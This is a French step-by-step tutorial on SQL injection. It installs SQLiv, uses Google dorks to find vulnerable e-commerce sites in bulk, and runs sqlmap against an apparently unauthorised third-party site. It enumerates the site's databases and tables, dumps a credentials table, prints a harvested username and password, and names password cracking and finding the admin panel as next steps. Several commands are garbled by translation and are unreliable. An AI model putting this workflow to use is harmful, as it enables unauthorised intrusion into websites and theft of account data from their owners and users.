SQL injection
A : OBJECTIF
L'objectif principal est d'améliorer la sécurité des données afin de les protéger
contre les accès non autorisés et les menaces potentielles provenant d'entités
externes, conformément aux meilleures pratiques et normes du secteur.
B : INSTALLER SQLIV SUR KALI LINUX
SQLiv est un outil de détection et d'exploitation des vulnérabilités d'injection
SQL dans une base de données d'un site web. Son utilisation à des fins non
autorisées ou malveillantes est illégale et contraire à l'éthique.
Tapez les commandes ci-dessous dans votre terminal pour installer SQLiv :
~ #git clone [Link]
~ #sqliv CD && sudo python2 [Link] -i
SQLiv sur Kali Linux (/usr/bin/sqliv) : scanner vulnérabilités SQL via 'sqliv'
dans le terminal, détecte et exploite les failles d'injection SQL de manière
éthique.
C : TROUVER LES VULNÉRABILITÉS D'INJECTION SQL
Google Dorking avec SQLiv pour détecter des vulnérabilités SQL sur des sites
e-commerce via le modèle d'URL « [Link]?id= », explorez d'autres modèles
avec une recherche "google dork list".
~# sqliv -d inurl:[Link]? identifiant = -e google -p 100
SQLiv explore par défaut la première page de Google, soit 10 sites, mais avec
l'argument -p 100, nous analysons 10 pages (100 sites). Avec l'exemple d'URL
donné, des résultats de vulnérabilités ont été obtenus.
D : SQL INJECTION USING SQLMAP
Après avoir identifié une cible vulnérable à l'injection SQL avec SQLiv, nous
utilisons SQLMap pour l'attaque. En commençant par révéler le nom de la base
de données, nous explorerons ensuite ses tables et colonnes pour extraire les
données.
URL cible : [Link]
ÉNUMÉRER LE NOM DE LA BASE DE DONNÉES :
Modèle de commande :
~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom-
table --columns
Ainsi, la commande compilée ressemblerait à ceci :
~# sqlmap -u "[Link] -D
acfurniture -T paramètres --columns
Le résultat devrait ressembler à ceci :
Nous avons obtenu le nom de la base de données « acfurniture »
.
ÉNUMÉRER LE NOM DES TABLES
Modèle de commande :
~# sqlmap -u « URL CIBLE » -D nom-base de données --tables
Ainsi, la commande compilée ressemble à ceci :
~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom-table –
columns
Le résultat devrait ressembler à ceci :
Disposition des données sur [Link] : Deux bases de données,
acfurniture et information_schema. La base acfurniture a quatre tables :
category, product, product_hacked et settings. En examinant le tableau des
paramètres, nous trouvons des colonnes et des données.
ÉNUMÉRER LES COLONNES
Modèle de commande :
~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom-table --
columns
Ainsi, la commande compilée ressemble à ceci :
~# sqlmap -u "[Link] -D ac
furniture -T paramètres --columns
Le résultat devrait ressembler à ceci :
Le tableau des paramètres se compose de 6 colonnes et il s'agit en fait d'un
compte d'identification. Vidons ces données.
E. VIDE DONNEES
Modèle de commande :
~# sqlmap -u « URL CIBLE » -D nom-base de données -T nom -table -
C colonnes --dump
Ainsi, la commande compilée ressemble à ceci :
~# sqlmap -u "[Link] -D acfurnit
ure -T paramètres -C nom d'utilisateur, mot de passe --dump
Ou vous pouvez également vider toutes les données de la table en utilisant la
commande :
~# sqlmap -u "[Link] -D acfurnit
ure -T paramètres --dump
Le résultat devrait ressembler à ceci :
Email : jackie@[Link]
Nom d'utilisateur : Handsome
Mot de passe : 9HPKO2NKrHbGmywzIzxUi
RESUME
En utilisant l'injection SQL avec SQLMap sur [Link], nous avons
réussi à extraire des données de deux bases de données, acfurniture et
information_schema. La base acfurniture contient des tables telles que category,
product, product_hacked et settings. Après avoir vidé des données, l'objectif
suivant est de trouver le panneau d'administration sur les sites cibles. Avant cela,
la nécessité de déchiffrer le mot de passe (9HPKO2NKrHbGmywzIzxUi) est
soulignée. Bien que cette démarche n'implique pas un piratage direct du site, elle
met en lumière des vulnérabilités potentielles et souligne l'importance de
renforcer la sécurité des bases de données pour prévenir de telles attaques,
souvent utilisées dans des contextes malveillants comme la recherche de
comptes de cartes de crédit sur des sites de commerce électronique.